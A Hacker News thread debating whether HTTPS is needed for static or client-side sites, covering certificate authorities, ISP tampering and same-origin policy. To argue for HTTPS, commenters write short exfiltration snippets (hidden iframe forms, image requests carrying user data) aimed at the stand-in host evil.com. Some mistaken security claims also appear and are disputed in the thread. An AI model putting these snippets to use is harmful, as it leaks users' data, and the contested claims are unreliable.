I think that the argument that you can't trust ISPs is weak.. With HTTPS, you still need to trust certificate authorities. It is somewhat suspicious that Google suddenly decided to create their own Certificate Authority in 2017. Forcing every website to use HTTPS just reduces the pool of entities who are able to track and manipulate us and it gives a false sense of security.

There is no doubt that this change is designed to take power away from some entities and to put it in the hands of a few key players which Google trusts.

Also, the video created by the author is highly deceptive; the author makes it look like he has hacked the website itself; in reality, he has only intercepted the traffic to his own machine so in reality he has only modified his own view of the website; he hasn't actually hacked anything. I'm sure that the author is being intentionally deceptive; he knows exactly who the target audience for that video is and he knows exactly what it looks like.


Certificate authorities that participate in Certificate Transparency are forced to publish all certificates they issue, so site owners can tell if a fraudulent certificate for their own domain is ever generated. I think browsers are pushing for all CAs to adopt Certificate Transparency. This greatly reduces the power of malicious CAs.


The web was supposed to be open and free; it was supposed to democratize the exchange of information. We have lost control of it by allowing corporations to subvert that idea.

Frightening stupid people by exaggerating threats that they don't fully understand is what corporations do to sell their products and services.

Using a browser underwritten by a large corporation is a very bad idea. When it pops up a message saying that a static website is insecure, it's time to get another browser.


All websites need onion/i2p addresses, not HTTPS.


chrome://flags

Mark non-secure origins as non-secure

Disabled


People here are bringing up the difficulty for a regular user to set up HTTPS.

I want to go one further: WHY does a regular user need to buy a human-readable domain name, maintain it, and pay for a hosting company to host on that domain?

It used to be worse - you had to have your own machine or use some crappy shared hosting service. Amazon figured out that letting people share managed virtual machine instances was good savings. That’s now called “the cloud” but it’s still under the control of some landlord - Amazon, DigitalOcean, etc.

Let’s face it, the easiest thing we have today is some web based control panel by CPanel running on some host that charges $5/month or something.

It’s 2018. Why don’t we have something like MaidSAFE and Dat working yet? We should have:

  1) End to end encryption

  2) One giant, actually decentralized cloud composed of all nodes running the software

  3) Storing chunks of encrypted data using Kademlia DHT or similar

  4) Maybe even periodic churn on the back-end so you can’d find and collude with the servers hosting the chunks

  5) All underlying URLs would be non-human-readable and clients would display (possibly outdated) metadata like an icon and title (this metadata may change on the Web anyway). Storing and sharing could occur using QR codes, NFC bluetooth, Javascript variables, or anything else. For static files, the links could be content-addressable.

  6) All apps and data would be stored encrypted in the cloud and only decrypted at the edges. They would run on the clients only. Apps could also be distributed outside the cloud, but usually just via a link to a cloud URL.

  7) Communities would likewise be just regular users, rather than private enterprises running on privileged servers running some software like github is now. No more server side SaaS selling your data or epic hacks and breaches. 

  8) Users would have private/public key pairs to auth with each community or friend. They would verify those relationships on side channels for extra security if needed (eg meet in person or deliver a code over SMS or phone). Identity and friend discovery across domains would be totally up to the user.

  9) Private keys would never leave devices and encryption keys would be rotated if a device is reported stolen by M of N of other devices.

  10) Push notifications would be done by shifting nodes at the edges, rather than by a centralized service like Apple or Google. In exchange for convenience, they can expose a user to surveillance and timing attacks.
No more waiting endlessly to be “online” in order to work in a SaaS document. The default for most apps is to work offline and sync with others later.

No central authorities, CAs or any crap like that. Everything is peer to peer. The only “downside” is the inability to type in a URL. Instead, you can use one or more indexes (read: search engines) some of which will let you type existing URLs, or something far more user friendly than that, to get to resources.

Domains and encryption key generation would be so cheap that anyone can have a domain for a community of any kind, or even just for collaborating on a document.

There won’t any longer be a NEED for coupling domains to specific hardware somewhere, and third party private ownership/stewardship of user-submitted content would be far less of a foregone conclusion, fixing the power imbalance we have with the feudal lords on the Internet today.

Once built, this can easily support any applications from cryptocurrency to any group activities, media, resources etc.

If you are intrigued by this architecture, and want to learn more or possibly get involved, contact greg+qbix followed by @ qbix.com - we are BUILDING IT!


> I want to go one further: WHY does a regular user need to buy a human-readable domain name, maintain it, and pay for a hosting company to host on that domain?

Because there's no interest in that. Getting a domain name is already cheap and easy.

> Storing chunks of encrypted data using Kademlia DHT or similar [...]

I've yet to see any P2P system have low latency, high speed and high reliability.

> All underlying URLs would be non-human-readable and clients would display (possibly outdated) metadata like an icon and title (this metadata may change on the Web anyway). Storing and sharing could occur using QR codes, NFC bluetooth, Javascript variables, or anything else. For static files, the links could be content-addressable.

Why?

> The only “downside” is the inability to type in a URL.

Good luck saying to your friend the nice webstore you got your hoodie from is [insert non-readable non-pronounceable url].

> and third party private ownership/stewardship of user-submitted content would be far less of a foregone conclusion

This is unacceptable for law enforcement

> If you are intrigued by this architecture, and want to learn more or possibly get involved, contact greg+qbix followed by @ qbix.com - we are BUILDING IT!

Oh this is an ad...


I'm not trying to advertise, but Beaker browser does a real good job of making p2p delivery transparent to the end user. It's probably slower than most sites in normal usage, but certainly acceptable speeds for static sites, and it performs better under the hug-of-death a site gets when posted on Hacker News. :)

Plus, it already has existing methods to map DNS records or servers to the p2p records, so I can access dat://beakerbrowser.com/ or dat://epa.hashbase.io/ and get it served across the p2p network or pull it up offline if I've viewed it before.


> The only “downside” is the inability to type in a URL.

This is not tenable. You have to solve Zooko's Triangle or no one will use your thing. That's the existing problem with Dat, which otherwise works wonderfully.


Why do you want to type in URLs? It’s like the command line before it was replaced by GUIs for the majority of people who are non technical.


Because people don't just send URLs around online? If you tell people your site address in person/by phone/in a non tech context, they need to be able to type it in easily enough.


So you can just have your company’s NAME on Google let’s say. Many people actually type stuff into Google instead of the address bar. They don’t even know the difference!

And honestly, I know what it is like to dictate a phone number or name over the phone. You have to spell it out, then they say it back to you. They say “C like Charlie”. Seriously? This is what you are saying people will WANT to preserve this crap?

No way. People will be very happy to get rid of dictating stuff on the phone. How about AT LEAST copypasting into a text? Using words to dictate an address or phone number requires error correction and super slow annoying transmission.

And if you DO tell people something, it is usually typed into a search engine. What if I want to share a URL that’s more complex than “nytimes.com”? What if I want to share an article on NYTimes? HAVE YOU EVER DICTATED THAT TO SOMEONE? So come on. The most you can comfortably do via manually typing what you heard into an address line is to go to the fromt page of a website. That’s a tiny subset of the URLs.


I admin a number of different websites. The majority of them are static. I have forced https redirect on some of them. On others I do not.

The only benefit of https I perceive in the case of static public content is that ISPs cannot easily monitor which specific pages on my domains are being visited. With plain http they could.

I don't particularly care if people get MITM'ed when visiting my static sites. If they did so it generally is because they chose to use unsafe public access points ( wifi ). This extends to some degree to all forms of wifi since so many security forms in use on them can be easily broken.

My current understanding is that enterprise encryption using certs with wifi is still secure and cannot currently be broken.

The only other party would could do MITM against normal customers on their own home internet, while using wired connections, is, I believe, the ISP themselves. Random third parties cannot generally do so. If there is some plausible way they can do so I would like to hear it.

If your ISP is MITMing you, I think you have bigger problems then whether they change the content of my static site when you visit it. If they were, they could potentially target your initial download of your browser and downgrade to http to infect your browser so that you never realize after that that https is faked out...

I think there are caching benefits to using plain http. The primary one is so that your ISP can cache your static content and save internet bandwidth globally.


> generally is because they chose to use unsafe public access points

It sounds like you are penalizing users for not using a vpn or some other method when out of their homes. Yes, people can do that, but in 2018 having https on the sites you manage is a lot easier than asking every possible visitor to use a vpn. I hope you would reconsider and enable https on all the sites you are an admin.

> If your ISP is MITMing you, I think you have bigger problems then whether they change the content of my static site when you visit it. If they were, they could potentially target your initial download of your browser and downgrade to http to infect your browser so that you never realize after that that https is faked out...

They could, and maybe in countries other than the US you have plenty of ISP choices, but in many places in the US, you are stuck with just one ISP.

And so far, we know that ISPs are manipulating http traffic but so far they haven't gone all the way to give you an infected browser. Again, it is possible, but I think that a better approach is if we all do as much as we can to help each other, the internet could be a better place.


It's all good to point this out, but it's a social argument, not a technical one. If the technical arguments have been eliminated (e.g. you have no technical use for encrypting the connection) then you're left with "Join us in giving the finger to ISPs/cafe routers that inject foreign JS!" Don't be upset when people say "Meh. Take it up with those ISPs directly, or with web browser vendors, I don't care and don't want to join your crusade." At some point web browsers will stop serving content over HTTP unless perhaps with a custom flag turned on, and even then, some people will still not use HTTPS.


> I don't particularly care if people get MITM'ed when visiting my static sites. If they did so it generally is because they chose to use unsafe public access points ( wifi ). This extends to some degree to all forms of wifi since so many security forms in use on them can be easily broken.

While wifi offers little "complete" security, some methods of security, (like implementing HTTPS) require very little work for a relatively large decrease in attack surface


Also, remember that people who get MITMed are not going to say "Oh, sucks to be me for using insecure public wifi and getting pwned when visiting nanoscopic.io, I'm such an idiot..." - they're going to say "The shit-weasel who runs nanoscopic.io installed a fucking cryptominer and configured porn ad dns servers on my laptop! Don't _ever_ visit that site!"

The "very little work" required to use https these days could one day be incredibly valuable in terms of not having your reputation trashed... Perhaps you _should_ care a little more about people getting MITMed...


There are other threat vectors you aren't considering such as DNS cache poisoning, [BGP hijacking][1], and [rogue USB sticks][2].

But even ignoring that, why wouldn't you want to take basic steps to protect against rogue access points or ISPs? "I don't particularly care if people get MITM'ed when visiting my static sites" seems, at least to me, like a rather dismissive attitude towards the security of your site's users.

I'd also like to point out that with the ever-widening deployment of HTTPS the hypothetical attack you described where your ISP MITMS your browser install is becoming less and less feasible. Nearly all modern browsers include a [HSTS preload list][3] which ensures they will never attempt to connect to certain domains over an insecure connection. A browser download site (or even just the user's search engine, which would link directly to the HTTPS-protected download page) being on this list would make the downgrade attack you describe much more difficult.

[1]: https://www.internetsociety.org/blog/2018/04/amazons-route-5...

[2]: https://samy.pl/poisontap/

[3]: https://scotthelme.co.uk/hsts-preloading/


Rogers Cable is one of the few major ISPs in Canada and they used to (maybe still do? I moved away years ago) modify your page content to include data overage warnings or past due balance warnings at the top of pages you visited.

HTTPS everything please.


One benefit of HTTPS is that ISPs can't insert their ads onto your website. Believe me, there are ISPs that do that.

> If your ISP is MITMing you, I think you have bigger problems then whether they change the content of my static site when you visit it.

Perhaps. But in the UK ISPs are legally required to log every web page you visit. However, they are not going to serve you a fake version of Chrome (which is signed anyway).


>I don't particularly care if people get MITM'ed when visiting my static sites.

I for one would be honored, and then irritated.


> The only benefit of https I perceive in the case of static public content is that ISPs cannot easily monitor which specific pages on my domains are being visited

What about HTTP2?


I don't particularly care if people get MITM'ed when visiting my static sites.


Here's the truth about security: people are clueless about it and so corporations and governments abuse that by pushing their own agendas, not related to security.

Same corporations that tell you to "secure" your unimportant static website with https also want to force you to run random javascript in your browser from unknown parties, identify you at all times, link everything to your phone number, etc. In the end we are all going to be worse off with this let's encrypted web, with more control than ever in the hands of those few US corporations.


How are those related? Letsencrypt doesn't try to identify anyone, and certainly doesn't run JavaScript on your site.


I wonder what would happen if Let's Encrypt started charging for their service AFTER HTTPS became compulsory. Seems like a great (but evil) business strategy. All these CAs could just start increasing their prices and we'd all be forced to pay.

If you understand human behavior, then you know that this WILL happen eventually.


This might even make sense as "a great (but evil) business strategy" except Let's Encrypt isn't a business, it's provided by a charity, ISRG, the Internet Security Research Group, set up for exactly this purpose by people from Mozilla (a charity) and the EFF (another charity)

I suspect that the people behind ISRG weren't as paranoid as the Free Software Foundation about being corrupted by some hypothetical evildoers (the FSF has a whole mechanism to try to ensure that if you somehow take over the Foundation you can't use its resources to counter its original purpose) but you're going to need a bit more than a vague idea that people are capable of evil as an explanation for why good things are actually not good.


I don't know who has what legal remedies when a nonprofit acts inappropriately, but another observation is that most of Let's Encrypt's technology is developed in public.

https://github.com/letsencrypt

If you needed to set up another ACME-compatible CA on the same model (which could then be a drop-in replacement compatible with the existing client base), it would be a lot less expensive (although it would require datacenter build-out, hiring an operations team, and a variety of PKI-specific stuff like key ceremonies, HSMs, cross-signing, CPS, and audits).


I would think that there are enough competing vendors, and they are sufficiently interchangeable, that one vendor having low prices will drag the whole market down. That is, I believe that CAs are actually a nearly efficient market.


What are you talking about?


Don't forget the other elephant in the room: certificate revocation.

If your site isn't using HTTPS it will always be "not secure", but always accessible.

If it is, then it's accessible until someone decides to revoke your certificate for whatever reason.

The old quote is relevant again: "Those who give up freedom for security deserve neither."


Why wouldn't you? It took me 30 mins to read and set up a cert from let's encrypt.


Don't underestimate the weight of decisions, let alone the knowledge of a choice, and the care.

Also, see how often humans don't change from default settings -- ringtones, bootstrap themes, etc..


I have recently adopted HTTPS on my own site, because there are substantial performance benefits with HTTP/2 that are only available over HTTPS.

There are many arguments in the article, and more that he links to, arguing for the security benefits of HTTPS. HTTPS is good for protecting content.

One very serious argument that HTTPS evangelists avoid is when there is no content to protect the security benefits of HTTPS evaporate. My site is a web application that stores all user data in their browser. Their data does not come back to the server. The only thing that crosses the wire is a request for the application code and a response with that code.

I would argue this model of application is substantially more secure that sending data across the wire regardless of whether that transmission is encrypted. There is nothing individually identifiable or preferential about the application code. The content, identifiable information, and personal/private details remain with the user where they reside anyways.

---

EDIT

Before everybody jumps on the MITM attack bandwagon be aware of https://en.wikipedia.org/wiki/Same-origin_policy

A man in the middle attack can void the integrity of data crossing the wire, but it cannot trivially break privacy with simple modifications to code. This is by design in the architecture of the web.

The only violation in question is code integrity (availability portion of the security CIA triad). Fortunately, this is a solved problem so long as the application is open source. If an integrity violation occurs that renders the application defective simply compare the transmitted application code against the stored publicly available application code. This is made easier when the application in question is a diff tool that can fetch code from across the wire.


> One very serious argument that HTTPS evangelists avoid is when there is no content to protect the security benefits of HTTPS evaporate. My site is a web application that stores all user data in their browser. Their data does not come back to the server. The only thing that crosses the wire is a request for the application code and a response with that code. I would argue this model of application is substantially more secure that sending data across the wire regardless of whether that transmission is encrypted.

That's a case where HTTPS really is essential! If you serve your application code over HTTP, then I can MiTM that connection and replace your application code with something that reads all the user data from the user's browser and then sends it to evil.com.


You can implement authentication without encryption.

Also, who says that HTTP content is always plaintext?


> and then sends it to evil.com.

How would a man in the middle attack grant you that? This is the reason same origin policy exists. It is the foundation of web security. If can break SOP and prove it in a demonstration you can report this issue to Google as a defect in the top tier of their bug bounty for a sizable reward.


Without SSL, I can inject code directly into the main HTML, in the same origin context as yours.


Yes, but the comment I replied to mentioned sending compromised data to a browser and then sending user data from the browser to an untrusted third party. The browser will not typically allow that due to same origin policy and certainly not if content security policy is applied.


You keep saying the thing about same-origin; I wonder how you think Google Analytics and similar services work, if sites can't send data to external services.

CSP headers won't ever reach the browser if the attacker has MITM, so they are irrelevant.


They work the same way in HTTPS as they do in HTTP. Same origin applies to the domain of asset reference. If you have CSP in place you must specify an exception for GA or it won't work.

If the attacker has MITM capabilities they can redirect the page to an untrusted location and bypass the valid server completely. MITM isn't typically limited to layer 7 unless the goal is to stand in the encrypted tunnel.



If evil.com serves the proper CORS headers, then any site is allowed to make AJAX calls to it.

Also, the attacker could inject <img> tags with a src attribute pointing to "https://evil.com?userdata=...".

Also, if the attacker is already man-in-the-middle attacking yoursite.com, they could make the site's code make ajax calls to "yoursite.com/nothing-to-see-here". Users looking at the network requests may not notice anything is going on.


CORS requires an HTTP header white listing allowed domains. If the attacker can modify the HTTP headers they don't need to modify the HTTP body in order to perform an attack.

> Also, the attacker could inject <img> tags

First, the image needs to be requested using the same protocol that requested the page or it will notify the user of insecure assets. Second, but they would have to write a custom script to gather the data to append as the URI query string. Third, the image would need to be injected after the user has manually entered information to the site, which eliminates static images in the HTML source. Fourth, actually test this. When I test it I get a CORS error in the browser. Strangely, Chrome reports this as a warning instead of as an error, but the request is blocked and it never leaves the browser.

> Also, if the attacker is already man-in-the-middle attacking yoursite.com, they could make the site's code make ajax calls to

No, that is not allowed by the browser and will throw an error. It violates same origin policy. If you can figure out how to break same origin policy Google will pay you $5000 for reporting a significant issue to their bug bounty.


>CORS requires an HTTP header white listing allowed domains. If the attacker can modify the HTTP headers they don't need to modify the HTTP body in order to perform an attack.

The attacker owns evil.com. They can make it have any headers they want, and then javascript on yoursite.com or any other site is allowed to make ajax requests to it. (Of course, they'd still need to do a man-in-the-middle attack on yoursite.com to modify yoursite.com's javascript. They technically don't need to involve evil.com if they're MITMing yoursite.com as I mentioned at the end of my post above, but it is a technically possible thing for them to do.)

> First, the image needs to be requested using the same protocol that requested the page or it will notify the user of insecure assets.

The attacker can make evil.com use HTTPS if they need to. There's no restrictions stopping attackers from getting certificates for their own domains. HTTPS doesn't signify that the owner of the domain is trustworthy; it just signifies that the contents you receive from a URL weren't MITMed.

> Fourth, actually test this. When I test it I get a CORS error in the browser. Strangely, Chrome reports this as a warning instead of as an error, but the request is blocked and it never leaves the browser.

Did you test this on HN? HN uses an unusually restrictive Content-Security-Policy header to restrict where assets can be loaded from. It is a protection against this sort of attack, but only a weak one against a determined attacker who can manipulate page javascript or html: An attacker could make every element on the page be a link to evil.com?userdata=..., which a lot of users will probably click. The user might realize something is up, but the attacker has already gotten their data so it's a bad consolation prize. Also, in the specific case of MITM attacks, CSP is no help since an attacker can just strip the header off.

>No, that is not allowed by the browser and will throw an error. It violates same origin policy. If you can figure out how to break same origin policy Google will pay you $5000 for reporting a significant issue to their bug bounty.

(I don't mean to brag, but just to point out a possibly relevant credential: I have gotten a 4-digit bug bounty payment from Google before.)

If an attacker MITMs yoursite.com and modifies the javascript served by yoursite.com, then when a user navigates to yoursite.com, that javascript is allowed to connect to yoursite.com (or any domain that is served with CORS headers). The same origin policy is about preventing a domain from accessing domains that don't want to be accessed; it is not about preventing a domain from talking to anyone at all including itself. (Content-Security-Policy does focus on that, but it can be difficult to make bulletproof and should be treated as a defense-in-depth, and it's not relevant to MITM attacks at all since a MITM can just strip it.)


> The attacker owns evil.com. They can make it have any headers they want, and then javascript on yoursite.com or any other site is allowed to make ajax requests to it.

Only if the page is originally requested from evil.com or if evil.com is listed in the CORS http header from the legitimate domain.

In order for this attack to work evil.com needs to be added to the CORS list in the http header and JavaScript needs to be inserted into the page body to make XHR calls to the evil.com domain.

> Did you test this on HN?

I tested it on a couple of sites both with http and https. It is not a valid vector of attack. Don't take my word for it. Try it.

---

All these technical conversations are really a red herring based upon the untested assumption that modification of page traffic is trivial if the page is served over HTTP. While this is possible it isn't trivial and requires multiple stages of compromise.

Typically man in the middle attacks refer to encrypted traffic, such as HTTPS, instead of plain text traffic. The benefit of a man in the middle attack is that the attacker is in the encrypted tunnel between the two end points reading data that is otherwise encrypted and thereby voiding any benefit of encryption.

Modifying traffic is less trivial than reading traffic. It is certainly less valuable when there are security conventions in place to ensure end point authenticity, as in limited to only locations that are available by address and policy.

> I don't mean to brag, but just to point out a possibly relevant credential:

Don't care. I myself have found and reported a critical flaw in V8 that broke recursive function access under certain conditions. I don't remember when the resolution was released to V8, but it was first available to Node with 4.2.4 on 2015-12-23. All prior versions of V8 were impacted.

> If an attacker MITMs yoursite.com and modifies the javascript

And how would you do that? I have not seen anybody prove they can both MiTM a production site and modify the data in a way that breaks same origin policy yet everybody says its trivial. If you really want to brag and get another 4 digit bug bounty then prove that.


if evil.com is listed in the CORS http header from the legitimate domain.

That's not how CORS works; the header is read from the domain being called from JavaScript, not from the domain where the JavaScript came from. So in this case, the injected JS will call evil.com, and so the CORS headers will be read from evil.com.


>Only if the page is originally requested from evil.com or if evil.com is listed in the CORS http header from the legitimate domain.

You have CORS backwards. Domains give other domains permissions to access them in CORS. I think you're thinking of Content-Security-Policy here (which lets a domain specify other domains that may be interacted with from the domain), but I've already mentioned a number of issues with it (the first being that a MITM can just remove that header).

>I tested it on a couple of sites both with http and https. It is not a valid vector of attack. Don't take my word for it. Try it.

If you open example.com and run this in the console:

    (new Image).src = 'https://news.ycombinator.com/y18.gif?userdata=123'
then an HTTP(S) request is triggered. The operator of that domain's server can see a request happened and see the userdata parameter. (If you do it with a URL that doesn't respond with an image, then you may see a warning in the console like "Cross-Origin Read Blocking (CORB) blocked cross-origin response ...", but that warning only means that example.com doesn't get to read the response. The request still happened and the attacker already leaked the userdata.)

>All these technical conversations are really a red herring based upon the untested assumption that modification of page traffic is trivial if the page is served over HTTP. While this is possible it isn't trivial and requires multiple stages of compromise.

If the attacker is the ISP, or controls a wifi router that victims are using, then it's trivial[0].

>Typically man in the middle attacks refer to encrypted traffic, such as HTTPS, instead of plain text traffic.

Wasn't this entire comment chain started from you saying that HTTPS was unnecessary in some certain situation? Everyone is responding to you about attacks that are possible if you decide not to use HTTPS. I think we've lost the plot if you're going to interpret these attacks as if your site is using HTTPS.

> And how would you do that? I have not seen anybody prove they can both MiTM a production site and modify the data in a way that breaks same origin policy

Easy: run a public wireless router (or run an ISP) that people use to connect to HTTP sites. If you want, you can append some code to any javascript file coming through to POST the contents of localStorage (and indexeddb, etc) to a page on the same domain (and that request will go through you, so you see the data). You filter out any Content-Security-Policy headers that might restrict the page from making ajax connections to itself. There's only one domain involved, so same origin policy doesn't affect anything at all in this situation.

[0] http://www.ex-parrot.com/pete/upside-down-ternet.html


There are enough "gaps" in the SOP that you can trivially move data cross-origin: most obviously <form action="https://evil.com/" method="post" id="dummy"><input type="hidden" value="my-data"></form><script>window.dummy.submit();</script>.

In general terms, you can often write cross-origin, but you can't read.


A form submission would refresh the page to the evil domain. It would change the domain in the address of the page. This same vector of attack can still occur with HTTPS so long as the malicious code is injected from a XSS or CRSF attack.

The page address is the web's equivalent of physical security. If you cannot trust that there is no security.


Put it in an iframe, then. No URL change, no page change.

In any case, once the page has changed the URL visible to the user it's already too late. Their data is sent. I guess it's nice that they are informed that something happened but not really. And that unknown server could easily redirect the user straight back to the site they were on, so the user would only see a flash on their screen.


How would that help? See this: https://news.ycombinator.com/item?id=17861667


And even more stealthily, an iframe with display: none.


> A form submission would refresh the page to the evil domain.

The server at evil.com can just reply with a redirect and it's likely that the address bar will not even show that it was at evil.com at some point. It will probably show "Connecting to evil.com..." or "Transferring data to evil.com..." at some point depending on how much data there is to transfer. But it would likely not be good.com vs. evil.com, it would be good.com vs. good.com.services.co.


The iframe is still limited by same origin. The browser won’t let you cross the frames border if the domains are different. There is no attack there


In the form case that's easy:

<script> var f = document.createElement("iframe"); f.style.display = "none"; document.body.appendChild(f); // note that the iframe has now synchronously loaded about:blank, which is treated as same-origin var f_doc = f.contentDocument; f_doc.innerHTML = "<form…></form>"; f_doc.querySelector("form").submit(); f_doc = null; // allow the old document to be GC'd </script>

The fact the iframe navigates to a cross-origin page (and f.contentDocument will then be null) is irrelevant, because the data loss has already happened.


Did you try that code? I tried it in the browser console on this very page and it throws a security error in Firefox. It throws a null error in Chrome, so I modified the code so that the form actually has a method and an action, but it still fails. Chrome throws valid error messaging if the iframe action is not https but the actual page is. Otherwise Chrome still throws an error, but the response is not intelligible if the domain has no HTTP content security header. If the site has a content security header then the error message is valid:

  Refused to display 'https://www.cnn.com/' in a frame because an ancestor violates the following Content Security Policy directive: "frame-ancestors 'self' https://*.cnn.com:* http://*.cnn.com https://*.cnn.io:* http://*.cnn.io:* *.turner.com:* courageousstudio.com".
Cross origin still applies. This is not something the browser will let you bypass.

Here is the code I tested with:

  var f = document.createElement("iframe"); f.style.display = "none"; document.body.appendChild(f);var f_doc = f.contentDocument; f_doc.getElementsByTagName("body")[0].innerHTML = "<form method='post' action='https://cnn.com'></form>"; f_doc.getElementsByTagName("body")[0].getElementsByTagName("form")[0].submit(); f_doc = null;
I know everybody on here is a CCIE, CISSP, and a client side JavaScript expert, but I promise none of these violations work. If they did work the malicious actor would be stealing far more than simple form data and the web would be completely broken.

HTTPS is important because it prevents data from moving across the wire as plain text for everybody to see. It isn't magic.

https://en.wikipedia.org/wiki/Content_Security_Policy


That isn't the SOP stopping this from working—it's CSP.

And CSP vitally is opt-in: if I've performed a MITM attack on example.com I can send whatever CSP header I want, and I obviously control evil.com and therefore can send whatever CSP header I want there.

There are two things that stop that (from here to https://cnn.com) from working: firstly, HN sets:

    Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ https://cdnjs.cloudflare.com/; frame-src 'self' https://www.google.com/recaptcha/; style-src 'self' 'unsafe-inline'
The vital part here is "frame-src 'self' https://www.google.com/recaptcha/": this allows only two sources to be embedded within a frame (the current origin, i.e., https://news.ycombinator.com/ and the exact path https://www.google.com/recaptcha/).

I can't actually see that CSP header you're getting on https://cnn.com/ (probably because I immediately get redirected to their international edition, which sets a very different CSP header!), but your quote of the error message says what you need to know: it sets a "frame-ancestors" policy (i.e., it can't be put inside a frame except from those sources).

But again—CSP is opt-in, if I control http://example.com and http://evil.com (either directly or through a MITM) I can control what CSP header gets sent on both and therefore CSP provides no defence against such an attack (it does, however, provide a defence-in-depth against XSS and similar attacks, as it makes such an attack as this impossible).

As some evidence the SOP doesn't prevent form submission: https://developer.mozilla.org/en-US/docs/Web/Security/Same-o... says "Cross-origin writes are typically allowed. Examples are links, redirects and form submissions."

If you want more detail about such a thing working, you can follow the form submission algorithm in all of its gory detail: https://html.spec.whatwg.org/multipage/form-control-infrastr...

If you want my promise, as someone who's worked on browsers for around a decade, often around JS and DOM, and dealt with some of the triaging of crossfuzz issues, this absolutely does not violate the SOP and does work with no CSP headers in use.


SOP has the security properties of a piece of wet cardboard. That is, most attackers will refrain because punching wet cardboard gets them wet and covered in slimy cardboard, some will punch it extra hard for the same reasons.


How is the same origin policy helping when the attacker is impersonating your domain to the target?


How would the attacker impersonate your domain? They would need configuration access to a router in the path to perform DNS actions in order to accomplish this. If they had that would they would have their eye on much bigger prizes than merely impersonating an Apache server. If they did actually have that they could impersonate your domain, your site content, and your HTTPS trust with a spoofed cert. In that case HTTPS is more harm than good because you are still completely compromised, but with a false trust relationship.


DNS cache poisoning happens at a surprising rate. I had Verizon FIOS's DNS serve the wrong IP address for "www.google-analytics.com" before, for over 6 hours. The IP they returned for that hostname was located in Isreal, and was serving up malware in the analytics.js script on any page that included it.

Luckily www.google-analytics.com is HSTS preloaded, and the cert the attacker served wasn't signed, so the request was blocked.

But now imagine that instead of doing that to www.google-analytics.com, they did it to yoursite.com, but you don't have HTTPS enabled, so they are free to send whatever scrips they want to your users, return whatever data they want to their server (which the users's computer thinks is yoursite.com), and can even do a 301 redirect to their own domain after the initial attack to make sure they can keep unsuspecting victims under their control for long after their DNS cache poisoning gets fixed.


They would need configuration access to a router in the path to perform DNS actions in order to accomplish this.

Nope, they just need to poison its ARP cache. You can do that easily with a tool like Ettercap, if the router is in the same LAN as your machine. Every request (DNS, HTTP, etc) from the victim machine will now go to yours, and you control the responses it gets.

Note that they aren't impersonating the domain to the whole world (hence they can't get a valid certificate, since no CA will accept their request), only to a local computer.


ARP cache poisoning occurs at the switch not the router. It is an awesome form of attack, but access to the switch and the availability of that compromise are limited in scope. A single switch can only have so many machines connected even with VLANs. It also requires access from within the local LAN.

I really don't think anybody is thinking of ARP poisoning when all these comments here mention public facing MiTM attacks merely because a page is served with HTTP instead of HTTPS. Since ARP is only layer 3 it really doesn't care if the page is sent via HTTPS and works the same either way.


ARP poisoning is just an example of a very simple and easy attack that can affect anyone that ever uses a public hotspot - on a cafe, university, workplace, etc.

Another possibility - compromising home routers: https://arstechnica.com/information-technology/2018/05/hacke...

Other possible attacks would be to compromise an internal router at an office (affecting everyone up to the CEO), controlling a VPN or Tor exit node, etc.

None of these give you the possibility of creating your own cert, but they do give you enough MITM access to fully compromise an HTTP site.

Since ARP is only layer 3 it really doesn't care if the page is sent via HTTPS and works the same either way.

The attack works in the sense that the traffic starts flowing through the attacker's machine, but the attacker is still prevented from changing anything in the page. That's the whole point of SSL/TLS.



CSRF works the same whether the site is served via HTTP or HTTPS. CSRF attacks the server from the client, so HTTPS doesn't protect from this. HTTPS is an end-to-end encrypted tunnel.


It's trivial to hijack an unencrypted connection to inject anything.


> One very serious argument that HTTPS evangelists avoid is when there is no content to protect the security benefits of HTTPS evaporate.

If there is no content, you have no site, so the issue is moot.

> My site is a web application that stores all user data in their browser. Their data does not come back to the server. The only thing that crosses the wire is a request for the application code and a response with that code.

The application is content, and the thing you need HTTPS to protect. Otherwise, the application the user actually runs could be anything an attacker wants.

> I would argue this model of application is substantially more secure that sending data across the wire regardless of whether that transmission is encrypted.

It's not, because the code you send controls what happens with the data.

> A man in the middle attack can void the integrity of data crossing the wire, but it cannot trivially break privacy with simple modifications to code.

It can, because in an MITM the attacker impersonates your site. The therefore can bypass any protection offered the same origin policy, because they own your origin.


> if there is no content, you have no site, so the issue is moot.

That isn’t true either as TLS protects http headers in addition to the http body.

Modification of requested content does not void the same origin policy. Just because you could modify page content does not mean you could transmit that content to an alternate location.


> Just because you could modify page content does not mean you could transmit that content to an alternate location.

Yes, if I can masquerade as your domain, I can have the data transmitted back to the same server conducting the attack (which is the “same origin”), which can then send it anywhere else.


> Yes, if I can masquerade as your domain

How would you do that? If you could do that you could also masquerade the HTTPS connection and simply run HTTPS at the spoofed server using the spoofed X.509 cert from the legitimate web server.


You can't "spoof" a cert, that's its whole point. If you create a new, it won't have a valid signature, and if you copy the original, you won't have the associated private key to create valid responses.


https://www.computerworld.com/article/2897815/microsoft-blac...

To be more clear a malicious website can rely on fraudulently issued certificates to validate a spoofed domain. This is a bad cert that appears to be valid and establishes the same level of trust. That is why revocation lists and OCSP are necessary.


> My site is a web application that stores all user data in their browser. Their data does not come back to the server.

If you weren't using HTTPS a very simple MitM attack would send all of that data straight to any server. HTTPS doesn't just prevent intercepting AJAX communications, it prevents anyone from changing your webapp (js file) into something that uploads everything to evilcorp.com.



Ohh I dunno. Lets say you're running a non-HTTPS site and an attacker MITMs one of your users and injects JavaScript which will appear to come from your site into that users session.

At that point the attacker can use that JavaScript to send your user's data to another server under their control, same origin won't help, as the JavaScript will appear to come from your site.


Uh, a MiTM will just show an entire fake site, or it can drop your content and just send a redirect header to any website it wants.


Man in the middle attacks allow an attacker to read data over the wire. It does not mean the attacker and modify that data. It certainly doesn't mean the attacker can move traffic to a different end point.


Usually man in the middle attack refers to an attack where someone controls a connection between you and the server and is able to freely control the connection including modifying or completely fabricating any packets coming through. Your ISP and whoever controls the wifi router you connect to can modify any data coming through like this.


Uh, MiTM can modify traffic, tools to do that have been around at least 2 decades.



Which you've noted three times but is just as wrong the third time as the first. You can break/disable SOP when it's trivially easy to edit the code.


> You can break/disable SOP when it's trivially easy to edit the code.

How? SOP isn't related to the code. It is only concerned with the page address.


The point is that you can put the code wherever you want, including inside the same origin context (e.g. right in the main HTML).


Same-origin is the other way around, it protects evilcorp.com from being called by non-https.com. So a simple CORS setup on evilcorp.com would indeed allow you to send all user data by MITMing non-https.com


